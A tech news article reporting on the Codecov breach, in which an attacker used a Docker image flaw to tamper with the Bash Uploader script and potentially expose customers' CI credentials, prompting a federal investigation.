Codecov breach triggers fears of another SolarWinds-scale attack
The incident is being investigated by US federal authorities
When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.
US federal authorities are investigating a security breach suffered by software auditing company Codecov.
According to astatementput out by the San Francisco-based firm, an unscrupulous user broke through itsdigital defensesand modified its Bash Uploader script.
While Codecov has emailed all affected users, the nature of the changes to the script potentially puts thousands of customers at risk.
We’re looking at how our readers use VPN for a forthcoming in-depth report. We’d love to hear your thoughts in the survey below. It won’t take more than 60 seconds of your time.
Click here to start the survey in a new window«
Analysis of the breach suggests the threat actor took advantage of a shortcoming in Codecov’sDockerimage creation process, which allowed them to extract the credentials necessary to modify the Bash Uploader script.
Another SolarWinds?
Worryingly, it has emerged that the script was tampered with several times and the earliest unauthorized modification dates back to January 31, 2021.
As per reports, the intrusion was only detected several months later on April 1, thanks to a customer who noticed that there was something amiss.
In its statement, Codecov warns that any customers that have executed the tampered Bash Uploader script run the risk of losing their credentials, tokens, or keys stored in their continuous integration (CI) environments.
Are you a pro? Subscribe to our newsletter
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
While Codecov has taken a number of steps to address the breach, the attack has triggered fears of a SolarWinds-scale supply chain attack, primarily because of the length of time the tampered script remained in use and given the size of Codecov’s customer base.
Codecov has announced that a federal investigation into the incident is in progress.
ViaReuters
With almost two decades of writing and reporting on Linux, Mayank Sharma would like everyone to think he’sTechRadar Pro’sexpert on the topic. Of course, he’s just as interested in other computing topics, particularly cybersecurity, cloud, containers, and coding.
This new phishing strategy utilizes GitHub comments to distribute malware
Should your VPN always be on?
NYT Strands today — hints, answers and spangram for Sunday, November 10 (game #252)
